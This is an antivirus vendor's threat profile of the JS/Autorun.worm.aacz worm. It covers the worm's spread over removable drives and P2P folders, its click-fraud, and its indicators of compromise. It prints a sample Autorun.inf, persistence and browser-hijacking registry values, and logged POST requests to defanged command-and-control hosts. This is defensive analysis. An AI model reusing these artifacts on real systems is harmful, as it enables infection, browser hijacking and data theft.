For Home

Virus Profile: JS/Autorun.worm.aacz

Threat Search
Print
   
Virus Profile information details
Risk Assessment: Home Low | Corporate Low
Date Discovered: 9/21/2012
Date Added: 9/21/2012
Origin: Unknown
Length: varies
Type: Virus
Subtype: Worm
DAT Required: 6568
Removal Instructions
   
 
 
   

Description

This detection is for a worm that attempts to copy itself to the root of any accessible disk volumes. Additionally it attempts to place an Autorun.inf file on the root of the volume so that it is executed the next time the volume is mounted.

Indication of Infection

Presence of above mentioned files and registry keys
Presence of unexpected network connection to the above mentioned URL Address.

Methods of Infection

This worm may be spread by its intended method of infected removable drives. Alternatively this may be installed by visiting a malicious web page (either by clicking on a link), or by the website hosting a scripted exploit which installs the worm onto the user's system with no user interaction.
   

Virus Characteristics

“JS/Autorun.worm.aacz” is a Javascript Autorun worm that spreads over removable drives, network shares and Peer-to-Peer networks. The worm contacts remote sites to post information and download instructions, and also is used to perform click-fraud on selected Ads.

“JS/Autorun.worm.aacz” is an Autorun worm that can spread over removable drives and network shares by creating copies of itself in the root folder of each connected device or mounted share.

The malware uses the Autorun function to start first time infection on a clean machine.

In order to execute automatically, it also creates a file named Autorun.inf, which is used to initialize the Javascript. The code below is an example of such file:

  • [autorun]
  • shell\explore\command=g074.js
  • open=g074.js
  • shellexecute=g074.js
  • shell\open\command=g074.js


When the Autorun is executed by Windows, it will start WSCRIPT.EXE to run the Javascript file. This will ensure the file is executed in any machine that the removable drive is connected to afterwards.

Upon execution the malware creates the following folders to store its data files:

  • %PROGRAMFILES%\d184\
  • C:\cf9
  • It also drops a copy of itself in the following locations:
  • %PROGRAMFILES%\d184\<random>.js
  • Root folder of any removable drive
  • Zipped copy with random names on any P2P application shared folder
  • And it creates the following files:
  • C:\cf9\cbcb
  • C:\cf9\cd
  • C:\cf9\cf
  • C:\cf9\d28
  • C:\cf9\d389
  • C:\cf9\d980
  • C:\cf9\d990
  • %TEMP%\cdc
  • %TEMP%\d991


These files are used to store different types of information, like the OS name, the name of the current running javascript file, and the data downloaded from a Command and Control server (C&C).

The two files located in %TEMP% store the content downloaded from the Pirate Bay page, and the current Ad page being “clicked” by the malware

The malware uses the Autorun functionality to start the first time on a clean machine. After infection, it creates the following registry key to restart again after reboot:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\<random>: "%APPDATA%\<random>\<random>\.js"

The following registry keys have been created and modified by the Worm

  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page = “hxxp://sftwred.info/redirect.cgi"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\www = "hxxp://sftwred.info/redirect.cgi#"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix= "hxxp://sftwred.info/redirect.cgi#"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page =  "hxxp://sftwred.info/redirect.cgi"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\: "http://sftwred.info/redirect.cgi#"

The keys above ensure that Internet Explorer start page is changed for every user on the machine, to point to the URL "hxxp://sftwred[Removed] /redirect.cgi"

It also makes the default prefix for any URL to be hxxp://sftwred[Removed]/redirect.cgi#". This will ensure that whenever a user type an incomplete URL, without the http:// prefix, the malicious prefix will be added. This will cause the typed URL to be preceded by the malicious URL as shown below:

  • User Type: www.google.com

Malware changes to: hxxp://sftwred.info/redirect.cgi#www.google.com

The Worm connects to the below website to report the infection and information about the user machine, and to download more instructions:

  • jsh[Removed].net
  • nnh[Removed].name

Below are the request made to the above URL

  • POST /u/ HTTP/1.1
  • Content-Type: application/x-www-form-urlencoded
  • Cookie: PHPSESSID=yzkxodbmytljmdlindm3zwvlzj
  • Connection: close
  • Pragma: no-cache
  • Cache-Control: no-cache
  • User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)
  • Accept-Language: en-US
  • Content-Length: 0
  • Accept: */*
  • Host: jsh[Removed].net

The POST data is a Base-64 encoded binary data. It is not known what information is sent, but it may include personal information from the user’s machine.

The following requests were observed:

  • POST /u/ HTTP/1.1
  • POST /k/ HTTP/1.1

The malware then makes a query to Google.com searching for terms that depend on the instructions sent from C&C. Some example requests are shown below:

  • GET /search?q=lidgerwood%20hiashi HTTP/1.1
  • GET /search?q=polypage%20katsura HTTP/1.1
  • GET /search?q=amamioshima%20stiberg HTTP/1.1
  • GET /search?q=rhabditis%20amamioshima HTTP/1.1

After receiving the results, the malware will follow any returned link to perform the click-fraud on Ads in these pages. The domains and URLs accessed by the malware depend entirely on instructions from C&C, and may include valid websites. The list is extensive and will not be listed here since it may change constantly.

The malware also uses another method to spread to remote computers. It will copy itself to shared folders used by Peer-To-Peer applications. In order to do that, the malware first contacts the URL below:

  • hxxp://rss.thepir[Removed]bay.org/301

The list contains the newest files being shared on The Pirate Bay. The malware uses the filenames of the newest shared files to create zipped copies of itself, and copy these files to any P2P shared folder it can find in the machine.

The following P2P applications were observed to be used by the malware:

  • BearShare
  • EDonkey
  • Grokster
  • Kazaa
  • Limewire
  • Morpheus

The Zip file created by the malware has the same name as the latest shared files, and inside it will contain a file named “serial.js” which is in fact a copy of the malware.

Some examples of shared files:

  • 24 ONLINE CLIENT.zip
  • Admin Reset Password Utility [BootCD].zip
  • Adobe Acrobat X Pro v10.1.4.38 Multilingual Portable + Keyge.zip
  • Alcohol 120% v2.0.2.3929 ~HuNtEr~.zip
  • Alcohol.120.Percent.v2.0.2.3929-UNiQUE.zip
  • Allen Bradley Panel Builder 32  3.81.316.zip
  • Any Video Converter Ultimate 4.5.3 (cracked dll-davlat) [ChingLi.zip
  • AnyDVD + AnyDVD HD 7.0.9.0 Final+Crack By bobiras2009.zip
  • AVG Internet Security 2013 13.0 Build 2677a5774 incl.Serial.zip
  • BestCrypt.Volume.Encryption 3.50.02 Full {Prince96}.zip
  • Borderlands.2.v1.0.Plus.18.Trainer-FLiNG.zip

 

 
   

All Users:
Use current engine and DAT files for detection and removal.

Modifications made to the system Registry and/or INI files for the purposes of hooking system startup, will be successfully removed if cleaning with the recommended engine and DAT combination (or higher).